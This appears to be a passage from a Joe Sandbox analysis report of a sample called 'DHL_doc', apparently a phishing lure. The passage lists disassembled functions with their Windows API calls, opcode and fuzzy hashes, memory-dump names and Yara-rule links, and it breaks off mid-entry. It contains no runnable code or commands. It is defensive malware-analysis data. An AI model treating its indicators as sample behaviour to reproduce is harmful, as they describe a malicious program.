Instruction ID: 48c12b907cafa28dac65dc7caf627bacd7a015d9cc0802cf3081909b2c173fc6
Opcode Fuzzy Hash: 61b5f1d79aaec2836ad344ff24505f96c2c114fc32be652e3d815421969c57c4
Instruction Fuzzy Hash: A401A2B2209B1EBEF71116786CC0F77666DDF813BAB34236AF721B21D2DB628C005160

Function 00F21A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00F21A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F21A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F21A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F21A8A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 382095f78e456593e66d45efe89aa084178c2950acf30519712110d7d09b17ac
Instruction ID: a1fe168e587121235c3a8c41fcd02b48e9b8b8bacbfd742b7892444620f0698f
Opcode Fuzzy Hash: 382095f78e456593e66d45efe89aa084178c2950acf30519712110d7d09b17ac
Instruction Fuzzy Hash: 80113C3AD01229FFEB10DBA4CD85FADBB78FB18750F200091E604B7290D6716E50EB94

Function 00F2E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F2E1FD
MessageBoxW.USER32(?,?,?,?), ref: 00F2E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F2E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F2E24D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 959fd6c3d279fdc86909ca2a5c35a3323e469ddae75e40696d787eb1f78eacac
Instruction ID: 3b9d8771ba40001fef02f852ad0ea978cda6d93832b9eada1b038fa09de6f9ff
Opcode Fuzzy Hash: 959fd6c3d279fdc86909ca2a5c35a3323e469ddae75e40696d787eb1f78eacac
Instruction Fuzzy Hash: 96110872D0436DFFC7019FA8AC05E9E7FACEB45321F104226FA26E3290D270C90097A0

Function 00EED1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00EECFF9,00000000,00000004,00000000), ref: 00EED218
GetLastError.KERNEL32 ref: 00EED224
__dosmaperr.LIBCMT ref: 00EED22B
ResumeThread.KERNEL32(00000000), ref: 00EED249

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 5fcda9bf79c999a4608b650192c776a8551909ccbf0ee4dbeded64a011f5e8ca
Instruction ID: 9e919843a5192f3b6cb5e9696e4e50f0b5165927642c6af9d4fc098ce68fd2d6
Opcode Fuzzy Hash: 5fcda9bf79c999a4608b650192c776a8551909ccbf0ee4dbeded64a011f5e8ca
Instruction Fuzzy Hash: 8801D63680924CBFC7115BA7DC05BAE7AA9DF85731F105259FA25B21E0DB718901D6A0

Function 00F59EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00ED9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00ED9BB2

GetClientRect.USER32(?,?), ref: 00F59F31
GetCursorPos.USER32(?), ref: 00F59F3B
ScreenToClient.USER32(?,?), ref: 00F59F46
DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00F59F7A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: df50c2b58321b050b0b2efdeea99999d56452edf00df86b274a69d44e749f9c5
Instruction ID: ddbf2c245aa26deea981d5eb7ef31d100556c9cce64f6cc0aade2ad483703cf2
Opcode Fuzzy Hash: df50c2b58321b050b0b2efdeea99999d56452edf00df86b274a69d44e749f9c5
Instruction Fuzzy Hash: 2D11483290421AEFDB14DFA9DC899EE77B8FB05312F000451FA12E3141D374BA85EBA1

Function 00EC600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00EC604C
GetStockObject.GDI32(00000011), ref: 00EC6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC606A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: ca4914ba9fe53d4cdc88f1ed167582a64475d584b2e7e7a1bad570d98189bb1b
Instruction ID: 73f29702d4ff5635b9d0d5a03bd49c6b023f4ec0332f066966085e7857d21ade
Opcode Fuzzy Hash: ca4914ba9fe53d4cdc88f1ed167582a64475d584b2e7e7a1bad570d98189bb1b
Instruction Fuzzy Hash: F8118E72101608BFEF224F949D45FEB7B69EF08359F001115FA0566010C7329C61AB90

Function 00EE3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00EE3B56

Part of subcall function 00EE3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00EE3AD2
Part of subcall function 00EE3AA3: ___AdjustPointer.LIBCMT ref: 00EE3AED

_UnwindNestedFrames.LIBCMT ref: 00EE3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00EE3B7C
CallCatchBlock.LIBVCRUNTIME ref: 00EE3BA4

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 063b3614a4a61f5e85b9de4e0f1371689970b5cdc7bec65ba02461155a9f2259
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 8401407210018DBBDF125EA6CC46DEB7FADEF48754F045014FE4866161C732D961DBA0

Function 00EF3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00EC13C6,00000000,00000000,?,00EF301A,00EC13C6,00000000,00000000,00000000,?,00EF328B,00000006,FlsSetValue), ref: 00EF30A5
GetLastError.KERNEL32(?,00EF301A,00EC13C6,00000000,00000000,00000000,?,00EF328B,00000006,FlsSetValue,00F62290,FlsSetValue,00000000,00000364,?,00EF2E46), ref: 00EF30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EF301A,00EC13C6,00000000,00000000,00000000,?,00EF328B,00000006,FlsSetValue,00F62290,FlsSetValue,00000000), ref: 00EF30BF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 465298f90df1f5a75ab857258e0eec37ae90151f461b0758f948f083522f12f8
Instruction ID: e4adfbc574e51ef860c4cbb3025de38c003b35ae8591054647fd39ade8dd0694
Opcode Fuzzy Hash: 465298f90df1f5a75ab857258e0eec37ae90151f461b0758f948f083522f12f8
Instruction Fuzzy Hash: 0901D43230132EAFCB214B799C449B77B98AF05BA6B100622FB06F3240DF21D941C6E0

Function 00F27464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00F2747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F27497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F274AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F274CA

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 240c29b1ec7a9ed3db8d44387122d7091ee75288fa1d7e56b1baa886702034ea
Instruction ID: 07e57ef881f20c3caca51c890fd68731cb069d4a40718caad1adae31cdb27e5e
Opcode Fuzzy Hash: 240c29b1ec7a9ed3db8d44387122d7091ee75288fa1d7e56b1baa886702034ea
Instruction Fuzzy Hash: 2A11ADB1609324EFE720EF14EC08FA27BFCEB00B00F108569A616D6191D7B0E904EBA1

Function 00F2B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F2ACD3,?,00008000), ref: 00F2B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F2ACD3,?,00008000), ref: 00F2B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F2ACD3,?,00008000), ref: 00F2B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F2ACD3,?,00008000), ref: 00F2B126

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 751a65d8e56e1355a175e446178cf9c60674918e6bd92e9f90b0a83280ff2168
Instruction ID: fa618c312237601a3f286afe6c4c9f025a5c88375d5352d15a881756173676ff
Opcode Fuzzy Hash: 751a65d8e56e1355a175e446178cf9c60674918e6bd92e9f90b0a83280ff2168
Instruction Fuzzy Hash: 37111E31D01A3DDBCF00EFE5E9696EEBB78FF49711F114095D941B2282CB305551AB91

Function 00F22DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F22DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F22DD6
GetCurrentThreadId.KERNEL32 ref: 00F22DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F22DE4

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 3e7542e7c89332cae53f02d526489bbdd18ad4895928bcfed9c7220d6ed2bce1
Instruction ID: 142fba4cda6c3d83c78d1185f802c4eee2671239ddfc9ed7420b69eea7a66ee7
Opcode Fuzzy Hash: 3e7542e7c89332cae53f02d526489bbdd18ad4895928bcfed9c7220d6ed2bce1
Instruction Fuzzy Hash: 1CE0ED725017387BD7201BB3AC1DFEB7E6CEB56BA2F400115B60AD50909AA59941E6F0

Function 00F58863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00ED9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED9693
Part of subcall function 00ED9639: SelectObject.GDI32(?,00000000), ref: 00ED96A2
Part of subcall function 00ED9639: BeginPath.GDI32(?), ref: 00ED96B9
Part of subcall function 00ED9639: SelectObject.GDI32(?,00000000), ref: 00ED96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00F58887
LineTo.GDI32(?,?,?), ref: 00F58894
EndPath.GDI32(?), ref: 00F588A4
StrokePath.GDI32(?), ref: 00F588B2

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: fe99bf0a196d81094f370e76290ca517dd90be0af15352e7197c63b185cae671
Instruction ID: 6d16241b88407747cab029b43d7cb6298137cff3d78e032ad1ac2c8f76d73676
Opcode Fuzzy Hash: fe99bf0a196d81094f370e76290ca517dd90be0af15352e7197c63b185cae671
Instruction Fuzzy Hash: 32F03A36041759BADB126F94AC09FCA3B59AF06362F048001FB22A50E2C7755511EBE5

Function 00ED98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00ED98CC
SetTextColor.GDI32(?,?), ref: 00ED98D6
SetBkMode.GDI32(?,00000001), ref: 00ED98E9
GetStockObject.GDI32(00000005), ref: 00ED98F1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: e87c19ea9d3503c653db0177ed46f0c2aa4c114eca5e10053759d7a41919e5bf
Instruction ID: b5bb130961212b6dbfd9fc3a607f1f7870c58da34665e29d674f6d27d9c58441
Opcode Fuzzy Hash: e87c19ea9d3503c653db0177ed46f0c2aa4c114eca5e10053759d7a41919e5bf
Instruction Fuzzy Hash: 01E06531644784AEDB215B74AC09BD83F21EB11736F048219F7FA540E1C7714641AB10

Function 00F2162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00F21634
OpenThreadToken.ADVAPI32(00000000,?,?,?,00F211D9), ref: 00F2163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F211D9), ref: 00F21648
OpenProcessToken.ADVAPI32(00000000,?,?,?,00F211D9), ref: 00F2164F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 75d67a0ff5d993f724ec26226923c57c82009f375c3b035254593695e5944ef3
Instruction ID: f4d306e92bc34797b1efab3fdf3b95e654c54a8e6de53e75880c76451e05a096
Opcode Fuzzy Hash: 75d67a0ff5d993f724ec26226923c57c82009f375c3b035254593695e5944ef3
Instruction Fuzzy Hash: DBE04F71A02325AFD7201FA0AD0DB4A3B68AF54BA2F144808F346C9080D6244440E794

Function 00F1D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00F1D858
GetDC.USER32(00000000), ref: 00F1D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F1D882
ReleaseDC.USER32(?), ref: 00F1D8A3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 0a064c217ca0e39f249053a351e0defe9812e0325b5d43fe0e8b4271828b0ec9
Instruction ID: a4dcdf628c837c3992880600b255248eb782a0f4b92f33df46e17c8ff76190d7
Opcode Fuzzy Hash: 0a064c217ca0e39f249053a351e0defe9812e0325b5d43fe0e8b4271828b0ec9
Instruction Fuzzy Hash: 9CE0E5B1800308DFCB419FA0D908A6DBBB2EB08312B249009E90AE7290C7384A42AF80

Function 00F1D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00F1D86C
GetDC.USER32(00000000), ref: 00F1D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F1D882
ReleaseDC.USER32(?), ref: 00F1D8A3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 08a0a1dd8c90804746ed7ad69fd410cc24d2de13d966e61d583548e643340271
Instruction ID: 450b8ed6c0a8b127c390be4b33b4fe3322494999cfb13a3a981d1cb7f7b9d6a8
Opcode Fuzzy Hash: 08a0a1dd8c90804746ed7ad69fd410cc24d2de13d966e61d583548e643340271
Instruction Fuzzy Hash: 7FE09A75904308DFCF519FA0D90866DBBF5FB48712B149449EA4AE7250C7395A12EF90

Function 00F34D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC7620: _wcslen.LIBCMT ref: 00EC7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F34ED4

Strings

*, xrefs: 00F34E10
LPT, xrefs: 00F34DFB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: fc1313f245bb260439670457103a6b821a1ac4d82dfb13c737e714e64e8b21cf
Instruction ID: f211b9419f1f733331df3566c7cea494f1a8c70f2eaa513dd95d6272a580486d
Opcode Fuzzy Hash: fc1313f245bb260439670457103a6b821a1ac4d82dfb13c737e714e64e8b21cf
Instruction Fuzzy Hash: 9F916175A002049FCB14DF58C584EAABBF1BF44324F188099E84A9F3A2C735FD86DB91

Function 00EEE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00EEE30D

Strings

pow, xrefs: 00EEE2E5, 00EEE302

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1e40f1731ea9764f174f6edeb831a8cb90b433c6df3fa0c628ee3bff86f47232
Instruction ID: b1f8e040fda3fd1ad9dff56a763e3f2f4e3a74c7054133adc83d3beac0b0164e
Opcode Fuzzy Hash: 1e40f1731ea9764f174f6edeb831a8cb90b433c6df3fa0c628ee3bff86f47232
Instruction Fuzzy Hash: AD51AD61A0C60E96CB157B15CD013BA3BE4EB40744F7079A9E1E5B33E9EB318C81AA42

Function 00EDE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00EDE1B1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

